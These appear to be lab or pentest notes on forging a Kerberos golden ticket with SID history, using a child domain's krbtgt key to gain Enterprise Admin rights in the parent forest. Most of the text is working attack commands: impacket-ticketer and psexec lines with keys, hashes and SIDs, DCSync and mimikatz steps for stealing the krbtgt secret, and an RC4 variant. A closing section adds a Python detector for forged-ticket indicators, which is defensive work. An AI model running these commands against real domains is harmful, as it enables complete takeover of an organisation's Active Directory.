Golden Ticket

Craft ticket

impacket-ticketer -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991-519 Administrator -extra-pac

Access computer

export KRB5CCNAME="Administrator.ccache"

impacket-psexec sub.poseidon.yzx/Administrator@dc01.poseidon.yzx -k -no-pass -target-ip 192.168.126.161

Doc

Here's a breakdown of each parameter in the impacket-ticketer command for creating a golden ticket with SID history:

Command Breakdown:

1. -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2

  • What: AES256 key of the krbtgt account of the child domain; the KDC encrypts and signs every TGT with this key, which is why holding it is enough to forge one offline
  • How to get it:
    # From DCSync attack
    impacket-secretsdump -just-dc-user krbtgt domain/user:password@dc-ip

    # From mimikatz
    lsadump::dcsync /domain:sub.poseidon.yzx /user:krbtgt

    # From a DC with admin access
    # Caveat: the SAM hive holds only local accounts. Domain secrets such as the krbtgt key
    # live in NTDS.dit, so this pair yields local hashes only; the DCSync routes above are what return krbtgt.
    reg save HKLM\SYSTEM system.hive
    reg save HKLM\SAM sam.hive
    impacket-secretsdump -sam sam.hive -system system.hive LOCAL

2. -domain sub.poseidon.yzx

  • What: Your current domain name (child domain)
  • How to get it:
    # PowerShell
    $env:USERDNSDOMAIN
    Get-ADDomain | Select Name, DNSRoot

    # CMD
    echo %USERDNSDOMAIN%
    nltest /dsgetdc:

3. -domain-sid S-1-5-21-4168247447-1722543658-2110108262

  • What: SID of your current domain (sub.poseidon.yzx)
  • How to get it:
    # PowerShell
    Get-ADDomain | Select DomainSID

    # Using wmic (krbtgt's SID is the domain SID with RID 502 appended; drop the trailing -502)
    wmic useraccount where name="krbtgt" get sid

    # From any domain user SID: drop the trailing RID (the last dash-separated number)
    whoami /user

4. -extra-sid S-1-5-21-1190331060-1711709193-932631991-519

  • What: SID of the parent domain with RID 519 (Enterprise Admins, a group that exists only in the forest root domain) appended; it is placed in the ticket's SID history
  • How to get it:
    # Get parent domain SID
    Get-ADDomain -Identity poseidon.yzx | Select DomainSID

    # Or from parent domain trust
    Get-ADTrust -Filter * | Select Name, TargetDomainSid

    # Common RIDs to append:
    # -519: Enterprise Admins
    # -512: Domain Admins
    # -500: Administrator

5. Administrator

  • What: Username for the ticket
  • Note: Can be any username, even one that does not exist, because the ticket is signed with the krbtgt key rather than issued by a DC that would look the account up

6. -extra-pac

  • What: Populate the PAC (Privilege Attribute Certificate) with the extra UPN_DNS buffer in addition to the logon information
  • Purpose: A ticket with a fuller PAC is less likely to be rejected by a hardened DC

Alternative with NTLM hash:

# Using NTLM hash instead of AES (the resulting ticket is RC4-encrypted, etype 0x17,
# which stands out in 4769 events in a domain where AES is the norm)
impacket-ticketer -nthash b5d83edef61d3c3799047e208e13b2c7 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991-519 Administrator

Example to get all values:

# Get current domain info
Get-ADDomain | Select Name, DNSRoot, DomainSID

# Get parent domain info
Get-ADDomain -Server poseidon.yzx | Select Name, DNSRoot, DomainSID

# Get krbtgt hash (requires Domain Admin)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:sub.poseidon.yzx /user:krbtgt"'

This creates a golden ticket with Enterprise Admin privileges in the parent domain! It works because parent/child trusts inside a forest do not apply SID filtering to SID history, so the parent domain honours the injected Enterprise Admins SID; the forest, not the domain, is the security boundary.
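From the detection side, the notes above give three tells of a forged TGT: the DC never issued it (a 4769 service-ticket request with no earlier 4768 TGT request from that client), the account name may not exist in the directory, and the NTLM-hash variant yields RC4 (0x17) tickets. The following is an added example, not code from the original notes; the event records and the account list are constructed sample data shaped like fields exported from DC security events.

```python
"""Flag golden-ticket indicators in constructed 4768/4769 DC events (added example)."""

# Constructed sample events: id = event ID, etype = ticket encryption type, ts = order.
EVENTS = [
    {"id": 4768, "account": "alice", "ip": "192.168.126.50", "etype": "0x12", "ts": 100},
    {"id": 4769, "account": "alice", "ip": "192.168.126.50", "etype": "0x12", "ts": 120},
    {"id": 4769, "account": "Administrator", "ip": "192.168.126.99", "etype": "0x12", "ts": 130},
    {"id": 4769, "account": "ghost", "ip": "192.168.126.99", "etype": "0x17", "ts": 140},
]
# Constructed directory listing; a real check would query AD for sAMAccountName.
KNOWN_ACCOUNTS = {"alice", "Administrator", "krbtgt"}


def find_golden_ticket_indicators(events, known_accounts, aes_baseline=True):
    """Return (account, ip, reason) tuples, one per finding.

    Events must be aggregated from every DC in the domain: a TGT may have been
    issued by a different DC than the one answering the TGS request.
    """
    known = {a.lower() for a in known_accounts}
    seen_tgt = set()  # (account, client ip) pairs with a DC-issued TGT
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["account"].lower(), ev["ip"])
        if ev["id"] == 4768:
            seen_tgt.add(key)  # a real AS-REQ/AS-REP happened for this client
            continue
        if ev["id"] != 4769:
            continue
        # A forged TGT is never requested from a DC, so no 4768 precedes its 4769s.
        if key not in seen_tgt:
            findings.append((ev["account"], ev["ip"], "TGS request without a prior TGT request"))
        # The ticket's username is attacker-chosen and need not exist.
        if key[0] not in known:
            findings.append((ev["account"], ev["ip"], "account does not exist in directory"))
        # RC4 (0x17) is what the NTLM-hash variant produces; AES domains rarely see it.
        if aes_baseline and ev["etype"] == "0x17":
            findings.append((ev["account"], ev["ip"], "RC4 ticket in AES domain"))
    return findings


if __name__ == "__main__":
    for account, ip, reason in find_golden_ticket_indicators(EVENTS, KNOWN_ACCOUNTS):
        print(f"{account}@{ip}: {reason}")
```

The first check is the strongest of the three, since a legitimate client always obtains its TGT from a DC before requesting service tickets.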